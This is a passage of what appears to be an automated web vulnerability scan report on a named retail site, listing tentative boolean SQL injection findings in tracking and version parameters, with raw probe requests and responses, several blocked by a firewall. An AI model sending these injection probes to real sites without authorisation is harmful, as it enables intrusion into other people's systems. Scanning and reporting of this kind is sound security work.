GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55'%20and%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:40:38 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">FD93-D5AD-C1CD-45A9</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55'%20and%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:40:39 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->




   <link rel="s
...[SNIP]...

1.36. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The utm_content parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_content parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b'%20and%201%3d1--%20&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:39:16 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">EC40-EAA6-197E-4D06</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b'%20and%201%3d2--%20&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:39:16 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->




   <link rel="s
...[SNIP]...

1.37. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The utm_medium parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_medium parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display'%20and%201%3d1--%20&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:37:51 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">812E-ADAC-F15B-DC88</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display'%20and%201%3d2--%20&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:37:52 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->




   <link rel="s
...[SNIP]...

1.38. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The utm_source parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_source parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom'%20and%201%3d1--%20&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:36:11 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">78FC-DB12-C099-3AAB</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom'%20and%201%3d2--%20&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:36:11 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->




   <link rel="s
...[SNIP]...

1.39. http://www.bradsdeals.com/res/opt/global.js [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /res/opt/global.js

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 62280894%20or%201%3d1--%20 and 62280894%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /res/opt/global.js?v=2011082962280894%20or%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:39 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">7BBF-BAD8-1227-0783</div>
</div>
   </body>
</html>

Request 2

GET /res/opt/global.js?v=2011082962280894%20or%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Mon, 29 Aug 2011 21:05:22 GMT
Accept-Ranges: bytes
ETag: "095625d8f66cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:40 GMT
Content-Length: 192992

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-19 17:34:21 -0500 (Thu, 19 Feb 2009)
* Revision: 6246
*/
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(E))},selector:"",jquery:"1.3.2",size:function(){return this.length},get:function(E){return E===g?Array.prototype.slice.call(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector+(this.selector?" ":"")+E}else{if(H){G.selector=this.selector+"."+H+"("+E+")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){var E=F;if(typeof F==="string"){if(H===g){return this[0]&&o[G||"attr"](this[0],F)}else{E={};E[F]=H}}return this.each(function(I){for(F in E){o.attr(G?this.style:this,F,o.prop(this,E[F],G,I,F))}})},css:function(E,F){if((E=="width"||E=="height")&&parseFloat(F)<0){F=g}return this.attr(E,F,"curCSS")},text:function(F){if(typeof F!=="object"&&F!=null){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(F))}var E="";o.each(F||this,function(){o.each(this.child
...[SNIP]...

1.40. http://www.bradsdeals.com/res/opt/screen.css [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /res/opt/screen.css

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 19496541%20or%201%3d1--%20 and 19496541%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /res/opt/screen.css?v=2011061619496541%20or%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==

Response 1

